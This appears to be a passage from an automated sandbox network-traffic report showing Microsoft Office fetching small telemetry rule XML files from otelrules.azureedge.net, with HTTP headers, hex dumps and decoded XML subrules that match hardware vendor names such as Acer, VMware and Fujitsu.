                                                  2024-10-31 19:50:36 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  24192.168.2.45233713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:36 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:37 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                  ETag: "0x8DC582B9698189B"
                                                  x-ms-request-id: d7faccb9-c01e-002b-307f-276e00000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195036Z-16849878b7867ttgfbpnfxt44s00000009tg00000000sgds
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:37 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  25192.168.2.45233513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:36 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                  ETag: "0x8DC582BA310DA18"
                                                  x-ms-request-id: f0c209fa-601e-00ab-740d-2966f4000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195036Z-17c5cb586f6jwd8h9y40tqxu5w00000000zg00000000r16u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:36 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  26192.168.2.45233613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:36 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                  ETag: "0x8DC582B9018290B"
                                                  x-ms-request-id: f6d6c722-a01e-00ab-371c-289106000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195036Z-15b8d89586f42m673h1quuee4s0000000e5g000000002t9x
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:36 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  27192.168.2.45233813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:37 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:37 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA701121"
                                                  x-ms-request-id: 89d7e9f4-d01e-0066-46a8-2aea17000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195037Z-16849878b78hh85qc40uyr8sc80000000a6000000000ubn5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:37 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  28192.168.2.45233913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:37 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:37 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA41997E3"
                                                  x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195037Z-16849878b78bcpfn2qf7sm6hsn0000000bmg00000000dtm8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  29192.168.2.45234013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:37 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:37 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8CEAC16"
                                                  x-ms-request-id: abf73cf0-e01e-0052-5534-2ad9df000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195037Z-15b8d89586ffsjj9qb0gmb1stn0000000e80000000005d8n
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:37 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  30192.168.2.45234113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:37 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:37 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 464
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97FB6C3C"
                                                  x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195037Z-16849878b78q9m8bqvwuva4svc00000008gg00000000eryu
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:37 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  31192.168.2.45234213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:37 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:37 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB7010D66"
                                                  x-ms-request-id: 647ea265-801e-0067-10e5-29fe30000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195037Z-17c5cb586f626sn8grcgm1gf8000000008c000000000m3es
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:37 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.45234413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:38 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DACDF62"
                                                  x-ms-request-id: 48d00a26-901e-007b-7d77-2aac50000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195038Z-159b85dff8fj5jwshC1DFW3rgc00000001vg000000007mmu
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  33192.168.2.45234313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:38 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:38 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                  ETag: "0x8DC582B9748630E"
                                                  x-ms-request-id: bf2855ec-b01e-0084-57b7-2ad736000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195038Z-16849878b787wpl5wqkt5731b40000000ar000000000k77w
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.45234513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:38 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:38 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                  ETag: "0x8DC582B9E8EE0F3"
                                                  x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195038Z-16849878b78smng4k6nq15r6s40000000bkg000000004c4s
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
